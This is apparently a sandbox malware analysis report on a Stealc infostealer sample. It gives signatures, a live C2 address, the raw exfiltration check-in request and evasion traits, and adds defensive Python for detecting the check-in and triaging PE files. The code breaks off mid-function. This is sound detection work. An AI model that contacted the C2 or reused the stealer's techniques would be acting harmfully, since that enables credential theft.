Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1538495
MD5: 23b93e56b64c319ccc5f1754135ebd10
SHA1: 618c1cc4b62e2ef7ec0af6462a180910e6ffe973
SHA256: f0c4061792e560aa59a73574ea3824945a4394298bf2b9ad3e5b494e233c9790
Tags: exe, Stealc, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7008 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 23B93E56B64C319CCC5F1754135EBD10)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000001.00000003.1656947886.0000000004D40000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7008 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7008 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
1.2.file.exe.eb0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
No Sigma rule has matched
Suricata alerts (Timestamp | SID | Severity | Classtype | Source | Destination | Protocol):
2024-10-21T13:10:17.622612+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.9:49705 | 185.215.113.37:80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 1.2.file.exe.eb0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: file.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EBC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EC8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EBDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EBE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EBED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EBF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EBBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EBDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49705 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AAEBAKKJKKEBKFIDBFBA | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 38 46 42 42 32 36 43 37 35 31 31 39 39 31 36 32 37 33 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 2d 2d 0d 0a
    Data Ascii (line breaks restored from the 0d 0a pairs in the raw bytes):
    ------AAEBAKKJKKEBKFIDBFBA
    Content-Disposition: form-data; name="hwid"

    5C8FBB26C7511991627337
    ------AAEBAKKJKKEBKFIDBFBA
    Content-Disposition: form-data; name="build"

    doma
    ------AAEBAKKJKKEBKFIDBFBA--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EB4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic / unknown | HTTP traffic detected: the same GET / and POST /e2b1563c6670f193.php requests listed above are reported a second time here; neither carries a User-Agent header
Source: file.exe, 00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000001.00000002.1705510345.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1705510345.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000001.00000002.1705510345.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/a
Source: file.exe, 00000001.00000002.1705510345.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1705510345.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000001.00000002.1705510345.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
Source: file.exe, 00000001.00000002.1705510345.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpG
Source: file.exe, 00000001.00000002.1705510345.0000000000AF4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phph
Source: file.exe, 00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37so
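The check-in captured above is the whole C2 handshake this sample performed in the sandbox: a multipart POST to a 16-hex-character .php gate carrying only a hardware id and a build name, with no User-Agent header. The Python below is an added example, not Joe Sandbox's code or a vendor signature: it rebuilds the request from the raw bytes listed above, parses the multipart body, and applies a small heuristic classifier. The benign comparison request, the four indicators, the gate-path regex and all function names are this example's own assumptions.

```python
"""Parse and flag a Stealc-style C2 check-in from a captured HTTP request.

Added example, not Joe Sandbox code. The Stealc request below is rebuilt from
the raw bytes in the report; the benign request, the heuristic indicators and
every function name are this example's own assumptions.
"""
import re

# Rebuilt from the report's "Data Raw" hex dump: 211 bytes, matching Content-Length.
STEALC_BODY = (
    "------AAEBAKKJKKEBKFIDBFBA\r\n"
    'Content-Disposition: form-data; name="hwid"\r\n'
    "\r\n"
    "5C8FBB26C7511991627337\r\n"
    "------AAEBAKKJKKEBKFIDBFBA\r\n"
    'Content-Disposition: form-data; name="build"\r\n'
    "\r\n"
    "doma\r\n"
    "------AAEBAKKJKKEBKFIDBFBA--\r\n"
).encode()

STEALC_REQUEST = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----AAEBAKKJKKEBKFIDBFBA\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n" + STEALC_BODY
)

# Constructed benign upload for comparison (not from the report).
BENIGN_BODY = (
    "--xyz\r\n"
    'Content-Disposition: form-data; name="token"\r\n\r\nabc123\r\n'
    "--xyz\r\n"
    'Content-Disposition: form-data; name="file"; filename="a.txt"\r\n'
    "Content-Type: text/plain\r\n\r\nhello\r\n"
    "--xyz--\r\n"
).encode()
BENIGN_REQUEST = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: files.example.test\r\n"
    b"User-Agent: curl/8.4.0\r\n"
    b"Content-Type: multipart/form-data; boundary=xyz\r\n"
    b"Content-Length: %d\r\n\r\n" % len(BENIGN_BODY)
) + BENIGN_BODY

C2_PATH = re.compile(r"^/[0-9a-f]{16}\.php$")  # assumed shape of the gate path


def parse_http_request(raw: bytes):
    """Split a raw request into (method, path, headers, body); header names lowercased."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: value} for a multipart/form-data body."""
    fields = {}
    for part in body.split(b"--" + boundary.encode()):
        part = part.strip(b"\r\n")
        if not part or part == b"--":          # preamble / closing delimiter
            continue
        part_head, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'[;\s]name="([^"]*)"', part_head)  # skips filename="..."
        if m:
            fields[m.group(1).decode("latin-1")] = value.decode("latin-1")
    return fields


def classify_request(raw: bytes) -> dict:
    """Score the indicators that together characterise the observed check-in."""
    method, path, headers, body = parse_http_request(raw)
    ctype = headers.get("content-type", "")
    m = re.search(r"boundary=([^;]+)", ctype) if ctype.startswith("multipart/form-data") else None
    fields = parse_multipart(body, m.group(1).strip()) if m else {}
    indicators = {
        "multipart_post": method == "POST" and m is not None,
        "c2_path_shape": C2_PATH.match(path) is not None,
        "hwid_build_only": set(fields) == {"hwid", "build"},
        "no_user_agent": "user-agent" not in headers,
    }
    return {
        "path": path,
        "fields": fields,
        "body_len": len(body),
        "indicators": indicators,
        "stealc_checkin": all(indicators.values()),
    }


if __name__ == "__main__":
    for label, req in (("stealc", STEALC_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, classify_request(req))
```

The classifier deliberately requires all four indicators at once: a multipart POST with no User-Agent is common in legitimate embedded clients, and a bare 16-hex .php path alone is weak; it is the combination with a body that carries exactly `hwid` and `build` that matches what the Suricata rule above fired on. When feeding real captures, split the stream on the blank line before the body rather than trusting Content-Length, then compare the two as the example does.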

System Summary

Source: file.exe | Static PE information: section name: (empty or non-printable)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty or non-printable)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011C010E
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011B51C5
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0127D839
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_012828A2
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_012490C9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011FAB3C
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011D9375
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01204A32
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0127A259
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01236AE1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01289536
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01276D06
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0127BDAB
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0113AC48
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0111B4BF
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0126A4D3
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0126CF27
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01285E9D
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0127FE98
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00EB45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: qmrtgfvc ZLIB complexity 0.9948942253388554
Source: file.exe, 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000003.1656947886.0000000004D40000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EC8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EC3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\53WVB1CW.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 47%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1856000 > 1048576
Source: file.exe | Static PE information: Raw size of qmrtgfvc is bigger than: 0x100000 < 0x19f000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 1.2.file.exe.eb0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qmrtgfvc:EW;elheadqd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qmrtgfvc:EW;elheadqd:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EC9860 GetProcAddress (x21), LoadLibraryA (x5), GetProcAddress (x7)
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c9d58 should be: 0x1cf7a8
Source: file.exe | Static PE information: section name: (empty or non-printable)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty or non-printable)
Source: file.exe | Static PE information: section name: qmrtgfvc
Source: file.exe | Static PE information: section name: elheadqd
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011C010E push 31BB5D13h; mov dword ptr [esp], edx (at 1_2_011C0152)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011C010E push 5BCC052Dh; mov dword ptr [esp], eax (at 1_2_011C0331)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011C010E push ebp; mov dword ptr [esp], edx (at 1_2_011C038D)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011C010E push 56DEA6D2h; mov dword ptr [esp], ebx (at 1_2_011C03AE)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011C010E push 3203C0E8h; mov dword ptr [esp], esi (at 1_2_011C0421)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011C010E push 7525BEBAh; mov dword ptr [esp], ecx (at 1_2_011C0438)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011C010E push eax; mov dword ptr [esp], esi (at 1_2_011C044A)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011C010E push edx; mov dword ptr [esp], 7FB73BA1h (at 1_2_011C0461)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01316925 push esi; mov dword ptr [esp], ecx (at 1_2_0131696A)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01316925 push 07727874h; mov dword ptr [esp], edi (at 1_2_0131698C)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011B7901 push ecx; mov dword ptr [esp], eax (at 1_2_011B7932)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0132A11F push eax; mov dword ptr [esp], edx (at 1_2_0132A138)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0128E910 push edx; mov dword ptr [esp], 11DB4822h (at 1_2_0128E957)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0132796E push 3989B282h; mov dword ptr [esp], ecx (at 1_2_013279CE)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013531AD push eax; mov dword ptr [esp], edi (at 1_2_013531B7)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0136C9AE push ecx; mov dword ptr [esp], eax (at 1_2_0136CA1C)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_012B19B5 push eax; mov dword ptr [esp], 44CEF600h (at 1_2_012B19D8)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_012B19B5 push 693400D6h; mov dword ptr [esp], ebx (at 1_2_012B1A11)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_012B19B5 push 47A017B8h; mov dword ptr [esp], ebp (at 1_2_012B1A2B)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013701E6 push esi; mov dword ptr [esp], 6CFF13EAh (at 1_2_0137020B)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013701E6 push esi; mov dword ptr [esp], ebx (at 1_2_013702D1)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00ECB035 push ecx; ret (at 1_2_00ECB048)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011B51C5 push edx; mov dword ptr [esp], edi (at 1_2_011B5271)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011B51C5 push edx; mov dword ptr [esp], eax (at 1_2_011B528F)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011B51C5 push ebp; mov dword ptr [esp], 6D8FDDB1h (at 1_2_011B52D7)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011B51C5 push eax; mov dword ptr [esp], edi (at 1_2_011B52E2)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011B51C5 push ebp; mov dword ptr [esp], ebx (at 1_2_011B5343)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011B51C5 push eax; mov dword ptr [esp], edi (at 1_2_011B53B3)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011B51C5 push ecx; mov dword ptr [esp], 6130C492h (at 1_2_011B53B9)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011B51C5 push 6F735200h; mov dword ptr [esp], esi (at 1_2_011B5404)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_012F29DC push eax; mov dword ptr [esp], edi (at 1_2_012F2A13)
Source: file.exe | Static PE information: section name: qmrtgfvc entropy: 7.95313047636981
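Every static indicator in this section (entry point inside .taggant rather than .text, the sections named qmrtgfvc, elheadqd and .taggant, an entropy of 7.95 for qmrtgfvc, and a stored checksum of 0x1c9d58 where 0x1cf7a8 was expected) is computable from the PE headers alone. The Python below is an added example, not Joe Sandbox's code or the report's tooling: it parses PE32/PE32+ headers with the standard library only, computes per-section Shannon entropy, recomputes the image checksum with the standard algorithm (the same 16-bit fold that imagehlp's CheckSumMappedFile uses), and locates the section that owns the entry point. The standard-section list, the 7.0 entropy threshold, the function names and the embedded two-section test image are this example's own assumptions; pass a file path to triage a real sample.

```python
"""Static PE triage for header-level packer indicators: entry point outside
the standard sections, non-standard section names, high-entropy (packed)
sections and a CheckSum that does not match the file.

Added example, not Joe Sandbox code; standard library only. The standard
section names, the 7.0 entropy threshold and the embedded two-section test
image are this example's own assumptions, not data from the analysed sample.
"""
import math
import struct
import sys

STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata",
                     ".rsrc", ".reloc", ".bss", ".tls", ".pdata", ".CRT"}
HIGH_ENTROPY = 7.0  # assumption: compressed/encrypted payloads sit near 8.0


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant run, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Standard PE image checksum: 16-bit fold of every dword except the
    CheckSum field itself, plus the unpadded file length."""
    padded = data + b"\0" * (-len(data) % 4)
    skip = checksum_offset & ~3
    total = 0
    for i in range(0, len(padded), 4):
        if i == skip:
            continue
        total += struct.unpack_from("<I", padded, i)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def analyze_pe(data: bytes) -> dict:
    """Parse the PE32/PE32+ headers and report the indicators."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsections = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    if struct.unpack_from("<H", data, opt)[0] not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic")
    # AddressOfEntryPoint (+16) and CheckSum (+64) share their offsets in PE32 and PE32+.
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    stored = struct.unpack_from("<I", data, opt + 64)[0]
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append({"name": name, "va": va, "size": max(vsize, rawsize),
                         "entropy": shannon_entropy(data[rawptr:rawptr + rawsize])})
    entry_section = next((s["name"] for s in sections
                          if s["va"] <= entry_rva < s["va"] + s["size"]), None)
    computed = pe_checksum(data, opt + 64)
    return {
        "entry_rva": entry_rva,
        "entry_section": entry_section,
        "entry_outside_standard": entry_section not in STANDARD_SECTIONS,
        "nonstandard_sections": [s["name"] for s in sections if s["name"] not in STANDARD_SECTIONS],
        "high_entropy_sections": [s["name"] for s in sections if s["entropy"] >= HIGH_ENTROPY],
        "stored_checksum": stored,
        "computed_checksum": computed,
        # A zero CheckSum is merely unset (common for user-mode binaries); only a wrong non-zero value is a flag.
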